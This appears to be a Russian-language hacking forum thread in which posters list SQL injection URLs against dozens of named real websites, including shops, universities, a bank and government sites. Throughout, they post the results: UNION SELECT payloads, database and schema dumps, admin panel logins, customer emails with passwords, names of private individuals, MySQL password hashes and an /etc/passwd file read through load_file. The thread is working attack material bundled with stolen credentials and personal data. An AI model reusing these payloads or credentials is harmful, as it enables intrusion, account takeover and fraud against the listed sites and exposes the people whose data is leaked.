http://www.dare2livedog.com/detail.php?id=3687389798798761+UNION+SELECT+1,2,3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,CONCAT((SELECT+CONCAT(ema il,password)+FROM+zoomacti_products.users+LIMIT+6, 1)),32--

Fields email:password

[1]:David_masland@yahoo.com :ghijkl
[2]:clay@claybutler.com :lackluster
[3]:Billy@Hoo.com :ghijkl
[4]:mydol@earthlink.net :mydol
[5]:mizen@firstact.com :markizen
[6]:dtomsera@hpsarch.com :d2ljunik
[7]:gmarkel@dahlingroup.com :buster1
[8]:sedel@apidesign.com :edel9889
[9]:peter.sasmore@gmail.com :turbo
[10]:k8kruley@juno.com :bruin85
[11]:sschineller@comcast.net :ila105bs
[12]:joryaquino@yahoo.com :marketing
[13]:gretchenwalter@hotmail.com :dissert
[14]:milagros87@comcast.net :bosscake
[15]:helen_chill@yahoo.com :qqqqqqqqqq
[16]:dliltracks@yahoo.com :ddddd
[17]:aa@aa.com :aa
[18]:asdf@adsa.com :987
[19]:david_masland@yahoo.com :ggggg

Итд...


И еще один магазинчик


http://www.jewelleryforall.com/view2.php?id=277987987668768768+union+select+1,2,3 ,concat_ws(0x3a,user(),version(),database()),5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21--

Database Version: 5.0.45
Database name: jfa
User name: jfa@localhost

Database [jfa]
Table [PPorders (7 Rows)]
id
time
PPdata
total
items_array
sizes_array
prices_array
status
voucher
vouchercode
Table [addresses (7344 Rows)]
id
user_id
AddressType
Fname
Sname
tel
mobile
email
Line1
Line2
Line3
Line4
Town
State
PostCode
Country
updatedate
Table [banner (1 Rows)]
image1
image2
image3
image4
image5
image6
text
Table [banner2 (1 Rows)]
image1
image2
image3
Table [brands (34 Rows)]
id
brand
Table [chain_sizes (473 Rows)]
id
ref
16_avail
16_price
16_rrp
16_weight
18_avail
18_price
18_rrp
18_weight
20_avail
20_price
20_rrp
20_weight
22_avail
22_price
22_rrp
22_weight
24_avail
24_price
24_rrp
24_weight
26_avail
26_price
26_rrp
26_weight
28_avail
28_price
28_rrp
28_weight
Table [countries (239 Rows)]
country
code
region
Table [dump (7036 Rows)]
id
orderID
data
Table [instant_sale (1 Rows)]
id
sale
Table [links (3 Rows)]
id
title
url
description
Table [membership (1 Rows)]
number
Table [orders (2977 Rows)]
oid
time
name
addr1
addr2
addr3
town
county
state
country
postcode
tel
email
items_array
sizes_array
prices_array
total
clientid
ordertime
vbv
status
voucher
vouchercode
del_address
tracking
Table [pages (56 Rows)]
page
content
Table [products (7612 Rows)]
id
type
ref
title
description
rrp
price
image
image2
metal
stone
Table [reminders (21 Rows)]
id
username
email
date
notes
Table [ring_banner (1 Rows)]
image1
image2
image3
Table [ring_sizes (583 Rows)]
ref
h
h2
i
i2
j
j2
k
k2
l
l2
m
m2
n
n2
o
o2
p
p2
q
q2
r
r2
s
s2
t
t2
u
u2
v
v2
w
w2
x
x2
y
y2
z
z2
Table [ring_sizes2 (789 Rows)]
ref
sizes
prices
Table [shop_orders (2334 Rows)]
id
date
address_id
del_address_id
total
net
vat
postage
recorded
vpsStatus
vpsDetail
vpsTxId
vpsSecurityKey
vpsTxAuthNo
status
voucher
vouchercode
tracking
method
Table [shop_orders_items (2682 Rows)]
id
order_id
product_id
voucher
quantity
size
price
giftwrap
Table [temp (29 Rows)]
id
dump
Table [test (7 Rows)]
id
BillingAddress
BillingPostCode
DeliveryAddress
DeliveryPostCode
VendorTxCode
Amount
TxType
Status
StatusDetail
VPSTxId
SecurityKey
TxAuthNo
AVSCV2
AddressResult
PostCodeResult
CV2Result
VBVSecureStatus
GiftAid
Table [users (1962 Rows)]
id
membership
Table [vouchers (1648 Rows)]
id
username
oid
value
Table [watch_banner (1 Rows)]
image1
image2
image3

http://www.ambisousa.pt/php/inserir_comentario.php?id=-1+union+select+1,2,3,4,login,passwd+from+users--


http://www.ambisousa.pt/admin/


login:ambisousa
pass:sousinha

Куяк!!!

http://sim-cat.com/cats.php?sex=-0+union+select+1,version(),3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19/*&lang=eng

4.0.27-max-log


http://www.stylecat.ru/cats.php?sex=1+union+select+1,2,3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,version(),21,22,23,24,25 ,26,27,28,29--&breed=kbo&lang=rus

5.0.51a-log 2

The Winston Churchill Memorial Trust

Ниже представленный запрос такого вида, из-за отсутствия иного выхода по причине следующей ошибки:
Fatal error: Database error #1267: Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
возникшая, к примеру, при функциях user(), database(),version(). А поля таблиц проходят без проблем.

http://www.churchilltrust.com.au/news.php?id=-2+union+select+1,concat_ws(0x20,length(user()),cha r(ASCII(substring(user(),1,1)),ASCII(substring(use r(),2,1)),ASCII(substring(user(),3,1)),ASCII(subst ring(user(),4,1)),ASCII(substring(user(),5,1)),ASC II(substring(user(),6,1)),ASCII(substring(user(),7 ,1)),ASCII(substring(user(),8,1)),ASCII(substring( user(),9,1)),ASCII(substring(user(),10,1)),ASCII(s ubstring(user(),11,1)),ASCII(substring(user(),12,1 )),ASCII(substring(user(),13,1)),ASCII(substring(u ser(),14,1)),ASCII(substring(user(),15,1)),ASCII(s ubstring(user(),16,1)),ASCII(substring(user(),17,1 ))),char(ASCII(substring(database(),1,1)),ASCII(su bstring(database(),2,1)),ASCII(substring(database( ),3,1)),ASCII(substring(database(),4,1)),ASCII(sub string(database(),5,1)),ASCII(substring(database() ,6,1)),ASCII(substring(database(),7,1)),ASCII(subs tring(database(),8,1)),ASCII(substring(database(), 9,1)),ASCII(substring(database(),10,1)),ASCII(subs tring(database(),11,1)),ASCII(substring(database() ,12,1)),ASCII(substring(database(),13,1)),ASCII(su bstring(database(),14,1)),ASCII(substring(database (),15,1)),ASCII(substring(database(),16,1)),ASCII( substring(database(),17,1)),ASCII(substring(databa se(),18,1)),ASCII(substring(database(),19,1)),ASCI I(substring(database(),20,1)),ASCII(substring(data base(),21,1))%20)),3,4,5,6/*

database():churchilltrust
user():winston@localhost


http://www.churchilltrust.com.au/news.php?id=-2+union+select+1,password,3,username,5,6+from+user s/*

username:admin
password:4dm1n

магазин подарков
http://www.chudesa.com.ua/?page=prod_detail&prod_id=-456%20UNION%20SELECT%201,2,3,concat_ws(0x3a,USER() ,DATABASE(),VERSION()),5,6,7,8,9,10,11,12,13,14,15 %20%20--
version::4.1.22
user::u_chudesa@localhost
database::chudesa
в табле users были следующие персоны:
login:test login:vika
passwors:123 password:pjhbr
http://www.chudesa.com.ua/?page=prod_detail&prod_id=-456%20UNION%20SELECT%201,2,login,pass,5,6,7,8,9,10 ,11,12,13,14,15%20from%20users%20limit%200,1%20--ещё один магазин подарков
http://www.podarunky.kiev.ua/showpage.php?id=9999999%20UNION%20SELECT%201,2,3,c oncat_ws(0x3a,USER(),DATABASE(),VERSION()),5,6,7%2 0%20--
version::4.1.22-log
user::sitemaker@localhost
database::giftBase

Магазин медикаментов MEDIMAG
http://www.medimag.com.ua/index.php?view=products&razdel=4&sub=38&id=-278%20UNION%20SELECT%201,2,3,4,5,6,7,8,concat_ws(0 x3a,USER(),DATABASE(),VERSION()),10,11,12,13,14,15 ,16,17,18,19,20%20--
version::4.1.22
user::u_medimag_ap@localhost
database::medimag_apteka

табла с паролями
http://www.medimag.com.ua/index.php?view=products&razdel=4&sub=38&id=-278%20UNION%20SELECT%201,2,3,4,5,6,7,login,passwor d,10,11,12,13,14,15,16,17,18,19,20%20from%20users% 20--
login::admin
password::shutnick

Вход в админку через сайт, можно реально оформить заказ и подтвердить его.

Книжный магазин
http://market.factor.ua/books.php?book_id=-811%20UNION%20SELECT%201,2,concat_ws(0x3a,USER(),D ATABASE(),VERSION()),4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25%20--
version::4.1.20
user::market@localhost
database::market

http://www.pic.int/home.php?type=t&id=-24'+union+select+concat_ws(0x3a,user(),version(),d atabase()),2,3,4,5/*

PR7 webUser@localhost:5.0.27-community-nt-log:rc-web

http://sea.noctrl.edu/alumni.php?id=999+union+select+1,2,3,4,5,6,7,8/*


version: 5.0.22

Unitech

http://unitech.com.az/en/page.php?link=catalog&g=6+union+select+1,2,3,4,concat_ws(0x20,id,usernam e,password,user(),database(),version()),6,7,8,9+fr om+unitech_admin/*

user:uniroot@68.178.254.169
database:uniroot
version:4.1.22-max-log

http://unitech.com.az/admin/
username:uni
password:777

http://www.uztest.ru
на сайте имеется база данных на более чем 7,5 тыс учителей=))
http://www.uztest.ru/abstracts/?idscience=999+union+select+1,concat_ws(0x3a,versi on(),database(),user()),3,concat_ws(0x3a,name,emai l,login,password,idstatus,info1,info2,info3)+from+ a_user+limit+2,1--
db - uztest3_temp
version - 5.0.51a
user - uztest3_temp@localhost
админка - login: oldteacher pass:591121
админка форума - login:admin pass:goldfire757
P.s все пароли выводяться в не зашифрованном виде=)))

http://www.valitsus.ee/index.php?rep_id=294943&tpl=1007%27+union+select+1,2,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18/*&external=&search=&aasta=

Таблички:
admin,config,tbl,version

http://www.valitsus.ee/brf/admin

Доступ закрыт по айпи,если не ошибаюсь в очередной раз =______________=

Сайт турнира по программированию=) http://www.icl.ru
http://www.icl.ru/turnir/news.php?newsid=999+union+select+concat_ws(0x3a,pa ssword,username,login),2,3+from+contest.admins+lim it+2,1--
админка - pass:wordplay login: pupucya
пароли админов зашифрованы в MYSQL-4.x-Hash
вывод информации с пользователями:
http://www.icl.ru/turnir/news.php?newsid=999+union+select+concat_ws(0x3a,ni ckname,login,password,name,birthdate,city,email,cl ass),2,3+from+contest.user+limit+1,1--

пароли пользователей в незашифрованном виде ;-)
бд- turnir;
версия бд - 5.0.15-nt
юзер - contest@212.22.71.22
http://www.icl.ru/turnir/news.php?newsid=999+union+select+concat_ws(0x3a,ve rsion(),database(),user()),2,3--

http://www.bioticregulation.ru/foto/show.php?ng=5&lang=en&nc=-1+union+select+1,2,3,4,5,version(),7,8,9,10,11,12, 13--
http://www.bioticregulation.ru/foto/show.php?ng=5&lang=en&nc=-1+union+select+1,2,3,4,5,group_concat(table_name), 7,8,9,10,11,12,13+from+information_schema.tables+w here+table_schema=0x7070656c626132325f666f746f--
5.0.51a-log
ppelba22_foto@217.112.35.26
ppelba22_foto

http://www.inta.gatech.edu/faculty-staff/listing.php?uID=-20+union+select+1,2,3,4,5,6,version(),8,9,10,11,12 ,13,14,15,16,17,18,19--
4.1.22-max
inta@localhost
inta

http://dms.dartmouth.edu/faculty/facultydb/view.php?uid=-139+union+select+1,2,3,4,5,6,7,8,9,10,11,version() ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36,37,38--
5.0.51a-log
faculty_user@localhost
facultydb
таблицы: biblio,facultydb,profile,users
колонки(users): uid,name,add_perm,edit_perm,delete_perm,superuser
колонки(profile): id,facultydb_id,cv_filename,dv,bio_filename,bio
колонки(facultydb): uid,Personal_ID,status,Name_DND,Name_First,Name_Mi ddle,Name_Last,Name_Prefix,Name_Suffix,Position_Ti tle,Birth_Date,Department,Degree,Education,Interes ts,Programs,Courses,Grant_Support,Core_Facilities, URL,Telephone_Number,Facsimile_Number,Email_Addres s,Office,Assistant,Asst_Telephone,Asst_Email,Addre ss1,Address2,Address3,City,State,Zip_Code
колонки(biblio): Title,Authors,Source,PMID,Medline_AN,id,uid

http://www.northcarolina.edu/content.php/themes/printerfriendly.php?docnumber=-48117+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47 ,48,concat_ws(0x3a,user(),version(),database()),50 ,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,6 7,68,69,70--

uncga@localhost:4.1.20-log:uncga

http://market-doors.ru/show_cat2.php?grid=-5+union+select+concat_ws(0x3a,username,password)+F ROM+admin

u55818@10.10.223.215
5.0.67-log
u55818

admin:588eb5181b3ba704
http://market-doors.ru/admin.php

http://www.kubanjob.ru/vacanc.php?id=-15948+union+select+1,2,3,4,5,6,concat_ws(0x3a,user (),version(),database()),8,9,10,11,12,13,14,15,16, 17,18,19,20

Uwww2727S@localhost
4.1.21-log
udb2727

http://arendyi.ru/detail.php?de=-2362+union+select+1,2,3,4,5,6,concat_ws(0x3a,user( ),version(),database()),8,9,10,11

u8766@10.10.223.215
5.0.67-log
u8766_arendyi

http://www.arendyi.ru/login.php

Ольга:11111,
Ольга:777,
Ольга:222222,
Ольга:jkmuf,
Рая:2332

http://allookna.ru/?page=-19+union+select+1,2,concat_ws(0x3a,user(),version( ),database()),4,5,6,7,8,9,10,11
u52548@10.10.223.215
5.0.67-log
u52548

admin:fkkjadmin
http://allookna.ru/admin/

http://shark63.ru/index.php?cat=-3+union+select+concat_ws(0x3a,user(),version(),dat abase()),2--&subcat=0&det=0

u57848@10.10.223.215
5.0.67-log
u57848

- logins
shark:dZral

- logins_base
shark:dZral,avtorental:sc56Rnt,hertz:hop42gDr,shar k:ro6tSf35,avtorental:HQr57tu,hertz:htf47gH

- logins_buh_flagman
shark:dZral,shark:sdf7A

- logins_buh_ssp
shark:dZral,shark:sdf7A

http://shark63.ru/buh_shark
http://shark63.ru/buh_flagman
http://shark63.ru/buh_ssp
http://shark63.ru/base
http://shark63.ru/client

http://www.tetevent.ru/cat.php?bid=-37+union+select+1,concat_ws(0x3a,user(),version(), database())--

u64338@10.10.223.215
5.0.67-log
u64338

http://www.tetevent.ru/cat.php?bid=-37+union+select+1,concat_ws(0x3a,name,pass)+FROM+u sers--

admin:1

http://www.tetevent.ru/admin/

Berkeley.edu PR 9
http://sprg.ssl.berkeley.edu/~tohban/nuggets/?page=article&article_id=-14+union+select+1,unhex(hex(version())),3,4,5,6,7, 8,9,10,11/*
5 ветка.. но нифига (

Искал книжку)
Сlasses.ru

http://www.classes.ru/books-colibri-description/-188084+union+select+1,2,3,4,5,6,7,8,9,10,11,12,con cat_ws(0x3a,version(),user(),database()),14,15,16, 17,18--/

Тоже 5 ветка мускула
Сейчас просто соксов нет копать)Кто что надыбает,плиз стукните мне)

Банк спермы =)))

http://www.europeanspermbank.com/spermdonor/sperm_donor.php?donorId=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a3a,us ername,password,password2),10,11,12,13,14+from+tbl _member+limit+0,1--

login:kasholmes
pass:imogen

Выборка по юзерам
--------------------------

seresmaria
http://seresmaria.hu/blogpl.php?id=-23+union+select+1,2,concat(version(),0x3a,database (),0x3a,user()),4,5,6--
user(): root@localhost
database(): seres
version(): 5.0.32-Debian_7etch8-log
PR=4

mysql user:
debian-sys-maint
-------
mysql password:
AEBBCAE0B5458EF192DE7823AFC4EDD2BBFF0A24

логин и пасс от админки в соседней тему =)


компаниЯ Дельта Медикел
http://www.deltamedical.com.ua/includes/print.php?id=-24+union+select+1,2,concat(version(),0x3a,database (),0x3a,user()),4,5,6,7,8,9--
user(): deltamedua_1@localhost
database(): deltamedua_db
version(): 5.0.45
тИЦ=40
PR=3

http://www.deltamedical.com.ua/includes/print.php?id=-24+union+select+1,2,3,concat(user_id,0x3a,user_log in,0x3a,user_pass),5,6,7,8,9+from+users+limit+0,1--
1:eleanor:276a306b54b4dd5649640782bfeb3b09

http://www.mediaindex.ro/detalii_proprietari.php?id=-538+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT((S ELECT+CONCAT(TABLE_NAME,TABLE_SCHEMA)+FROM+INFORMA TION_SCHEMA.TABLES+LIMIT+1,1)),0x71),0x71)/*&subm=Cauta

версия 5-я
http://www.mediaindex.ro/admin/autentificare.php
админка

http://www.e-juridic.ro/articole/-monitorul-oficial-numarul-37-din-20-ianuarie-2009-2977+UNION+SELECT+1,2,3,4,5,6,7,8,9,AES_DECRYPT(AE S_ENCRYPT(CONCAT(Version(),0x2F2A2A2F,Database(),0 x2F2A2A2F,User()),0x71),0x71)+LIMIT+1,1.html

на мой взгляд интересная скуля

Database Version: 4.0.18
Database name: avocatul
User name: root@localhost

присутсвуют таблички
mysql.user
user
password
user
email
id
password
userid
http://www.e-juridic.ro/admin.php

Шоп:
http://www.sprucedanddappa.net/shop.php?id=1+union+select+1,version()--&sid=1
Название таблици с юзерами подобрать не удалось, кто подберет, скиньте в ПМ плз!
----------------------------------------------------
The End!

версия мускуль пятая и даже вроде мк выключены ;-)

5.0.24a-community-max-nt-log
jer029@65.182.101.165
jer029
https://www.jrogers.us/lintel/display.php?TopicId=2+union+select+1,user_name,3,4 ,pwd,6,7,8+from+users+limit+1,1/*

http://www.sensualdaydreams.com/cast/cast.php?id=-22+union+select+1,2,version(),4,5,6,7/*
5.0.32-Debian_7etch6-log

Снова щопы:
www.cafeorinoco.com
http://www.cafeorinoco.com/shop.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),databas e(),version()),5,6,7,8,9,10,11,12,13--
юзер/бд/версия мускула:
orinoco@localhost:orinoco:5.0.51a-log
Колонки из таблици discounts:
http://www.cafeorinoco.com/shop.php?id=-1+union+select+1,2,3,column_name,5,6,7,8,9,10,11,1 2,13+from+information_schema.columns+where+table_n ame=0x646973636f756e7473--
idx
code
type
amount
deleted
---------------------------------------------------------
www.nobilistilia.ru
http://nobilistilia.ru/shop.php?ID=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),datab ase(),version()),6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21--
юзер/бд/версия мускула:
zonny@localhost:nobilistilia:5.0.75
Колонки из таблици baseusers:
http://nobilistilia.ru/shop.php?ID=-1+union+select+1,2,3,4,group_concat(column_name),6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+in formation_schema.columns+where+table_name=0x626173 657573657273--
ID_User
RecDate
RecAct
UsType
UsName
UsLogin
UsPassw
ID_User
RecDate
RecAct
UsType
UsName
UsLogin
UsPass
ID_User
RecDate
RecAct
UsType
UsName
UsLogin
UsPassw

-------------------------------------------
The End!

А вот вам банк в домене ru:
www.kbhmb.ru
http://www.kbhmb.ru/index.php?id=7+union+select+1,2,convert(concat_ws( 0x3a,user,password)+using+latin1),4,5,6,7,8+from+m ysql.user--
логин/пасс:

vasselect:*8BF7ACF013E0D295ADE08E3A755EFB4D5EA4734 3 vasinsert:*8FF7E1FC81B393BF0DBA4C7E3655194DF97D78E 7 max:*832EB84CB764129D05D498ED9CA7E5CE9B8F83EB root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9

Смотрим file_priv:
http://www.kbhmb.ru/index.php?id=7+union+select+1,2,convert(file_priv+ using+latin1),4,5,6,7,8+from+mysql.user--
Ура, на рута права Y
Читаем ect/passwd:
http://www.kbhmb.ru/index.php?id=7+union+select+1,2,convert(load_file( '/etc/passwd')+using+latin1),4,5,6,7,8+from+mysql.user--
Все читается:
toor:*:0:0:Bourne-again Superuser:/root: daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin operator:*:2:5:System &:/:/usr/sbin/nologin bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin news:*:8:8:News Subsystem:/:/usr/sbin/nologin man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin _pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin max:*:1001:1001:Domozhakov Maxim:/home/max:/bin/sh bbush:*:1002:1002:Basil Bush:/home/bbush:/bin/csh mysql:*:1004:1004:User &:/home/mysql:/bin/sh oracle:*:71:71:Oracle:/usr/local/oracle7:/bin/sh ftp:*:14:5:Anonymous FTP Admin:/usr/home/ftp:/nonexistent vit:*:1005:1005:Ridinger Vitaly:/home/vit:/bin/sh skat:*:1006:1006:skat:/home/vit/skat:/bin/sh e-sbyt:*:1007:1006:e-sbyt:/home/vit/e-sbyt:/bin/sh gorgas:*:1008:1006:Gor Gas:/home/vit/gorgas:/bin/sh idea:*:1009:1006:OOO IDEA:/home/vit/idea:/bin/sh domserv:*:1010:1006:domserv:/home/vit/domserv:/bin/sh
Можно есче сходить в коренную диру:
http://www.kbhmb.ru/index.php?id=7+union+select+1,2,convert(load_file( '../../../')+using+latin1),4,5,6,7,8+from+mysql.user--
Ну вроде как все...дальше думаю сам разберешся ;)
---------------------------------------------------------
The End!

http://www.oskar.ro/galerie.php?id=-825+union+select+1,2,3,CONCAT_WS(0x3a,Version(),Us er(),Database()),5,6,7--

version: 5.0.67-community-log
user : oskar_osky@localhost
database : oskar_oskar

Из всей базы интересуют только таблицы
useri и users

из первой не вывел ничего а из второй:
password:admin:data:email:id:nume

baubau:0:2008-09-01 17:43:59:fotoeseu@yahoo.com:1:Bogdan Apostol
baubau#11:0:2008-09-15 11:38:23:ionescu_danok@yahoo.com:2: Daniel Ionescu
alecsandra:0:2008-10-07 12:21:21:nathanail_antimi@yahoo.com:4:George Vintila
blabla:0:2008-10-13 23:26:58:cnimigean@gmail.com:5:Constantin Nimigean
universum:0:2008-10-23 15:41:04:b.simion2003@gmail.com:7:Belea Simion
nihilsinedeo:0:2008-11-01 14:02:55:mircea.teodorescu@gmail.com:9:mircea teodorescu
samir33:0:2008-11-01 21:17:47:horiat@gmail.com:10:Horia Tudor
giulestino:0:2008-11-02 22:10:05:t_horatiu@yahoo.com:12:Horatiu Tatar
master:0:2008-11-12 06:09:38:amihai22@yahoo.ca:14:adrian mihai

http://www.forum18.org/Archive.php?article_id=809809809809100+union+selec t+1,2,concat_ws(0x3a,user(),version(),database()), 4,5,6,7,8,9,10--

User:forum18_u@localhost
Version:5.0.67
Database:forum18

http://www.running4women.com/health.php?article_id=176969879879879879800+union+ select+concat_ws(0x3a,user(),version(),database()) ,2,3--

User name:runwindsor@localhost
Database Version:4.0.21-standard
Database name:runwindsor

http://www.practicalfishkeeping.co.uk/pfk/pages/show_article.php?article_id=1876876876006876876876 +union+select+concat_ws(0x3a,user(),version(),data base())--

Database Version: 5.0.67-log
Database name: practical_fishkeeping
User name: practfish-web@localhost

http://stranasovetov.com.ua/?p=articles&article_id=98798776876287610+union+select+1,concat _ws(0x3a,user(),version(),database()),3,4,5,6,7,8--

Database Version: 5.0.67-community-log
Database name: stranaso_vni
User name: stranaso_stranas@localhost


Не раскручивал.Был пьян -)

Berkeley.edu

http://www.ocf.berkeley.edu/~surf/view_post.php?id=18%20union%20all%20select%201,ver sion(),3,4,concat(email,0x3a,password),6,7,8,9%20f rom%20users%20limit%202,1--

admin login
usrename: streeter
passsword: addpost

http://www.ocf.berkeley.edu/~surf/admin.php

Онлайншопер на Постгри -)


http://hsus.petfulfillment.com/productdetail.php?productid=2091+union+select+null ,version(),null,null,null,null,null,null--

PostgreSQL 7.4.2 on i686-pc-linux-gnu, compiled by GCC gcc (GCC) 3.3.2 20031022 (Red Hat Linux 3.3.2-1)



http://hsus.petfulfillment.com/productdetail.php?productid=2091+union+select+null ,table_name,null,null,null,null,null,null+from+INF ORMATION_SCHEMA.TABLES--


http://hsus.petfulfillment.com/productdetail.php?productid=2091+union+select+null ,COLUMN_NAME,null,null,null,null,null,null+from+IN FORMATION_SCHEMA.columns--


http://hsus.petfulfillment.com/productdetail.php?productid=2091+union+select+null ,password,null,null,null,null,null,null+from+membe rs--

Username: admin Password : 321roy

Красотой не пахнет но пойдёт и так =)


VIAHOST - Надёжный хостинг -) гы улыбнуло

http://support.via.su/user.php?Category_ID=5/**/union/**/select/**/1,2,3,concat_ws(0x3a,user(),version(),database()), 5,6,7,8,9,10,11,12--&op=opCategoryThreadsShow&_lform=0&_id=162424756791014


User:extreem_root@localhost
Version:4.1.22
Database:FineBill


Еще один Шопер,но не раскурутил
Какая то муть с выводом в сипте.


http://www.moca.org/store/product_detail.php?pID=89796986986312+union+select +1,2,concat_ws(0x3a,user(),version(),database()),4 ,5,6,7,8,9,10--

User:moca@localhost
Version:5.0.24
Database:moca


http://www.lloyd.de/en/service/news.php?page=1&article_id=168768765400+union+select+1,2,3,4,conca t_ws(0x3a,user(),version(),database()),6,7,8--

User: dbo40336812@212.227.119.25
Version: 4.0.27-max-log
Database: db40336812


http://www.billsizemore.com/article.php?article_id=105679860+union+select+1,2, concat_ws(0x3a,user(),version(),database())--&category_id=3

User: sizemore_webuser@localhost
Version: 4.1.22-standard
Database: sizemore_sizemore


http://umixit.com/news/article_view.html?article_id=100987809760+union+se lect+1,2,3,4,5,6,7,concat_ws(0x3a,user(),version() ,database()),9,10,11,12,13,14--

User: umixit2_website2@localhost
Version: 4.1.21-standard
Database:umixit2_website2


http://www.securitymanagement.com.au/article.php?action=view&article_id=123467834200+union+select+1,2,3,4,conca t_ws(0x3a,user(),version(),database()),6,7,8,9,10, 11,12

Database Version: 5.0.37
Database name: securitymgmt
User name: securitymgmt@203.31.82.10

Достаём логин пасс

http://www.securitymanagement.com.au/article.php?action=view&article_id=123467834200+UNION+SELECT+1,2,3,4,AES_D ECRYPT(AES_ENCRYPT(CONCAT((SELECT+CONCAT(username, pass)+FROM+securitymgmt.users+LIMIT+1,1)),0x71),0x 71),6,7,8,9,10,11,12--


gordon : 7a1ad597a3a5fb9234eac26112fb1ffddc6bb6ff



http://www.greateryuma.org/articles/article_view.html?article_id=169807987960+union+se lect+concat_ws(0x3a,user(),version(),database()),2 ,3,4,5,6,7,8,9,10,11--

User: yumaedc_website@localhost
Version: 4.1.22-standard
Database:yumaedc_website


http://www.awctechprep.org/news/article_view.html?article_id=128097656+union+selec t+1,2,3,4,concat_ws(0x3a,user(),version(),database ()),6,7,8,9,10,11,12,13--

awc_techprep@localhost
4.1.20
awc_techprep

http://www.bniyuma.com/members/business_detail.html?id=5886876588+union+select+co ncat_ws(0x3a,user(),version(),database()),2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--&where_clause=

bniyuma@localhost
4.0.20
bniyuma

http://www.mitratech.com/about/details.php?article_id=106969540+union+select+1,2, concat_ws(0x3a,user(),version(),database()),4,5,6, 7,8,9,10,11,12,13--


User: db12266@10.1.3.31
Version: 4.1.25-Debian_mt1
Database: db12266_mitratech



тИЦ = 180
PageRank = 6

http://www.ncpa.org/sub/whatsnew/index.php?Article_ID=15670009800+union+select+1,co ncat_ws(0x3a,user(),version(),database())--

Database Version: 4.1.11-standard-log
Database name: whatsnew
User name: root@localhost

http://www.ncpa.org/sub/whatsnew/index.php?Article_ID=15670009800+UNION+SELECT+1,AE S_DECRYPT(AES_ENCRYPT(CONCAT(User,password),0x71), 0x71)+from+mysql.user+limit+7,1--

cmcgregor *125D791AB19AF8FD7F6B37B237038173D8DA5212
root *1CDFA4599A44CBA9CA969BA03E4F9079CD67771D
astle *95024238F421F27A07155A3267C6925D1B5D54E9 хэш MySQL5 : 95024238f421f27a07155a3267c6925d1b5d54e9:hemlock
repl *A424E797037BF97C19A2E88CF7891C5C2038C039 хэш MySQL5 : a424e797037bf97c19a2e88cf7891c5c2038c039:repl
brandon
rlyon *D7624E368C73DB8F2AD8747C90AEC4EC47BCA359
replicator *0EFECFE5946B7B520BE8C6380DEEAD0DC720FB28
wales *3CBD789A278AEABB649633E18D6C7E28EEED5A77 хэш MySQL5 : 3cbd789a278aeabb649633e18d6c7e28eeed5a77:wales


Читалка файлов -)

http://www.ncpa.org/sub/whatsnew/index.php?Article_ID=15670009800+UNION+SELECT+1,AE S_DECRYPT(AES_ENCRYPT(CONCAT(LOAD_FILE(0x2F6574632 F706173737764)),0x71),0x71)--

Ну и дальше дело техники -)




Ну и .edu на последок -)

тИЦ = 500
PageRank = 7

http://info.med.yale.edu/calendar/detailview.php3?event_id=547897699030+union+select +1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,c oncat_ws(0x3a,user(),version(),database()),21,22,2 3,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39, 40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56 ,57,58,59,60,61,62,63,64,65,66,67--&calendar_id=1&timeframe=ThisWeek&num_days=&palm=

User:ysm_calendar@web.med.yale.edu
Version:4.0.24-log
Database:ysm_calendar


http://www.azwestern.edu/news/article_view.html?article_id=12798654333+union+sel ect+1,2,3,4,5,concat_ws(0x3a,user(),version(),data base()),7,8,9,10,11,12--


awc_website@localhost
4.1.20
awc_website


Разработчики сих ошибок

http://www.mgmdesign.com/portfolio.html

параметр : article_view.html?article_id=1+скуля+

Всё спать надо.


Поспал блин -)

Еще один онлайншопинг -)

PR 5

База здоровая

http://www.musichristian.com/sys/product.php?PRODUCT=898989898563233+union+select+1 ,concat_ws(0x3a,user(),version(),database()),3--

Database Version: 5.0.26-log
Database name: musichri_database
User name: mcis_wbusr@10.0.90.131

